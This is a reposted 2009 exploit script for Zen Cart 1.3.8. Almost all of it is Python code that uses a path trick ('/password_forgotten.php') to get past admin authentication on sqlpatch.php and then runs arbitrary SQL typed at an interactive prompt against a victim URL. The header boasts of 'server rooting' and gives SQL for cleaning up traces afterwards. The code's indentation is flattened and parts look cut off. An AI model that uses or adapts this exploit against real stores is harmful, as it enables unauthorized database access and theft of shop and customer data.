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Zen Cart 1.3.8 Remote SQL Execution Exploit
来源:Bl4ck.H@gmail.com 作者:BlackH 发布时间:2009-06-24  

# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
# BlackH :)

# Notes: must have admin/sqlpatch.php enabled
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a,b = sys.argv,0

def option(name, need = 0):
global a, b
for param in sys.argv:
if(param == '-'+name): return str(sys.argv[b+1])
b = b + 1
print '\n#error', "-"+name, 'parameter required'

if (len(sys.argv) < 2):
print """
=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
|                  BlackH <Bl4ck.H@gmail.com>                          |
|                                                                      |
| $system> python """+sys.argv[0]+""" -url <url>                                 |
| Param: <url>      ex: http://victim.com/site (no slash)              |
|                                                                      |
| Note: blind "injection"                                              |

url, trick = option('url', 1), "/password_forgotten.php"

while True:
cmd = raw_input('sql@jah$ ')
if (cmd == "exit"): exit(1)
req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
print '>> success (', cmd, ")"
print '>> failed, be sure to end with ; (', cmd, ")"

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